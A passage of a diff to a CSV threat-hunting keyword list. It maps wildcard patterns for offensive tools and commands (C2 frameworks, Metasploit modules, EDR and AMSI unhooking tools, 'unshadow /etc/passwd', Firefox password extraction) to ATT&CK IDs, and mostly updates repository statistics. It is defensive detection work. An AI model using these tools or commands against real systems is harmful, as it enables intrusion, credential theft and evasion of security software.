Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" @@ -17921,83 +18105,83 @@ "*UmVmbGVjdGl2ZSBETEwgVVJJ*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Un1k0d3r/SCShell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*uname=FUZZ&pass=FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*Unblock-File .\install.ps1*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*Unconstrained_Delegation_Systems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*uname=FUZZ&pass=FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Unblock-File .\install.ps1*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*Unconstrained_Delegation_Systems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Und3rf10w*","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Und3rf10w","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*unDefender-master*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*undertheradar-main*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" -"*unhide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*unhide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*unhook kernel32*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*unhook wldp amsi*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*UnhookingKnownDlls.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*UnhookingNtdll_disk.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" -"*UnhookingPatch-main*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*UnhookingPatch-main*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*UniByAv*","offensive_tool_keyword","UniByAv","UniByAv is a simple obfuscator that take raw shellcode and generate executable that are Anti-Virus friendly. The obfuscation routine is purely writtend in assembly to remain pretty short and efficient. In a nutshell the application generate a 32 bits xor key and brute force the key at run time then perform the decryption of the actually shellcode.","T1027 - T1059 - T1029","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/UniByAv","1","1","N/A","N/A","3","239","67","2018-10-26T15:25:26Z","2017-08-15T21:57:15Z" "*unicorn.py *","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*unicorn-master.zip*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*unixpickle*","offensive_tool_keyword","Github Username","github repo hosting obfuscation tools","N/A","N/A","N/A","N/A","Defense Evasion","https://github.com/unixpickle","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*unkvolism/Fuck-Etw*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*unmanagedPowershell */command*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*unmarshal_cmd_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*UnmarshalPwn.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*UnmarshalPwn.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*unode/firefox_decrypt*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1622","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" -"*UnquotedPath.csproj*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*UnquotedPath.exe*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*unshackle --*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*unshackle-main*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*unshackle-v1.0.iso*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*unshadow /etc/passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*unshadow passwd shadow*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*untested_payloads.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*unmarshal_cmd_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnmarshalPwn.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnmarshalPwn.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*unode/firefox_decrypt*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*UnquotedPath.csproj*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*UnquotedPath.exe*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*unshackle --*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshackle-main*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshackle-v1.0.iso*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshadow /etc/passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*unshadow passwd shadow*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*untested_payloads.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - 